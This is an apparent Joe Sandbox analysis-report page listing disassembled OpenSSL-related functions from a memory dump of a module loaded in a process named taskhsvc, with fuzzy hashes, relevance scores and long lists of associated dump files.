                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_getsR_put_error
                                                            • String ID: f
                                                            • API String ID: 1595383539-1993550816
                                                            • Opcode ID: 1df63f7a816ae6600dd5dc339973eab6ba1519b4f53672a4fbf173d7ab438bf3
                                                            • Instruction ID: a0801692d7c8c2872f374cf8e512666f1b8064f53a18b0523460c28dbe2a6cd3
                                                            • Opcode Fuzzy Hash: 1df63f7a816ae6600dd5dc339973eab6ba1519b4f53672a4fbf173d7ab438bf3
                                                            • Instruction Fuzzy Hash: 1EA153B150D3829FD300CF29C18474AFBF1AF86308F56895EE4E88BB51D3B6D8498B52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE24F00 Relevance: 21.1, APIs: 14, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 838ba1976bb6e97fc2cab67808834e6b29760c679b0a5ed073df95e1815fbcd4
                                                            • Instruction ID: 77a7269ee8720641cfa138f80407d24007cb11710c1625152aad78e9dbf9d44d
                                                            • Opcode Fuzzy Hash: 838ba1976bb6e97fc2cab67808834e6b29760c679b0a5ed073df95e1815fbcd4
                                                            • Instruction Fuzzy Hash: 435121B16097018AEB10DF25C981B5BBBF5BF91748F21880EE9A88BB50D739D445CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF405F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_find
                                                            • String ID: E
                                                            • API String ID: 1886783827-3568589458
                                                            • Opcode ID: c367471e8c1b08c4554f579b6e7b6725604d8c99b9f0fe3e85b5a1b646f82dcd
                                                            • Instruction ID: 5c662f27fc54aebe07ed58027905777728633a3f10889ae99b3cc59629451caf
                                                            • Opcode Fuzzy Hash: c367471e8c1b08c4554f579b6e7b6725604d8c99b9f0fe3e85b5a1b646f82dcd
                                                            • Instruction Fuzzy Hash: 017167352196819FDB10DF25C680A4BBBF4FB99318F06991CEAA997741D730F904CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF36DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A$u
                                                            • API String ID: 0-1604213488
                                                            • Opcode ID: 290faf510abc2f4f63570d49ffb57e0574640a9169242f7cb0f6e9c90b2ee5f9
                                                            • Instruction ID: e079722df76868506812dae01057b5f7a9b97277afd54289314eeaf7b3322a38
                                                            • Opcode Fuzzy Hash: 290faf510abc2f4f63570d49ffb57e0574640a9169242f7cb0f6e9c90b2ee5f9
                                                            • Instruction Fuzzy Hash: 0A415571608711AFD700DF29C98025BBBF1BB89318F469A1DE998CB740E735E9448FDA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF36FB0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • i2d_NETSCAPE_SPKI.LIBEAY32 ref: 6CF36FD1
                                                              • Part of subcall function 6CF0A200: ASN1_item_i2d.LIBEAY32 ref: 6CF0A225
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF36FEB
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CF37008
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF37063
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF3706B
                                                            • ERR_put_error.LIBEAY32 ref: 6CF37097
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeO_malloc$N1_item_i2dR_put_errori2d_
                                                            • String ID: A$u
                                                            • API String ID: 1687252276-1604213488
                                                            • Opcode ID: a1243b9cd7ad24f2e37602766a0b778ddc111fb60ab4e69850bb7aa1a029ce87
                                                            • Instruction ID: 044697df33f02515ca5026069cabf8bb56e510911769046deff85069e9b16d60
                                                            • Opcode Fuzzy Hash: a1243b9cd7ad24f2e37602766a0b778ddc111fb60ab4e69850bb7aa1a029ce87
                                                            • Instruction Fuzzy Hash: E32115B55087049FD300AF29C58075FBBF4EF84788F12892DE8C88B711E77995889F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF44E00 Relevance: 18.2, APIs: 12, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CF34748), ref: 6CF44E23
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 622be3377e311017335c4d389de238e32805722aaea76e5ad43a5097c6fa6850
                                                            • Instruction ID: c8d9ef98855956a1df6f5798a0ba862f33e1622717340ce39a8535dba5a20571
                                                            • Opcode Fuzzy Hash: 622be3377e311017335c4d389de238e32805722aaea76e5ad43a5097c6fa6850
                                                            • Instruction Fuzzy Hash: 968110356187409FDB10EF69C580A4BBBF5BB89358F46C91CEA649B701D330E905CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF78540 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eae98bdf8065b186ad2ea29e19518773607a5df86bad04a3693e94a7190c6574
                                                            • Instruction ID: 82640e1522f485de0595b422442f560f4e789038c5a6aaf7f9ac571f56712c82
                                                            • Opcode Fuzzy Hash: eae98bdf8065b186ad2ea29e19518773607a5df86bad04a3693e94a7190c6574
                                                            • Instruction Fuzzy Hash: 0B711F35608A419FDB24DF39D55051B77F1BB8932CF41861EDA66ABB80CB30E901CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEE8D70 Relevance: 18.2, APIs: 12, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03feded89f3c9b557f6249ed0ccfae01094b51f9146f77bbea45f4dbc7dad6ec
                                                            • Instruction ID: e3b1028c6f7f1d222093ef7d1b167365572c6e5dd7eeca1149614a5681b1603f
                                                            • Opcode Fuzzy Hash: 03feded89f3c9b557f6249ed0ccfae01094b51f9146f77bbea45f4dbc7dad6ec
                                                            • Instruction Fuzzy Hash: 3C719131A18A408FDB20EF3EC54164B77F2AB4A35CF66C61ED6609BB04D731E905CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CECCD10 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
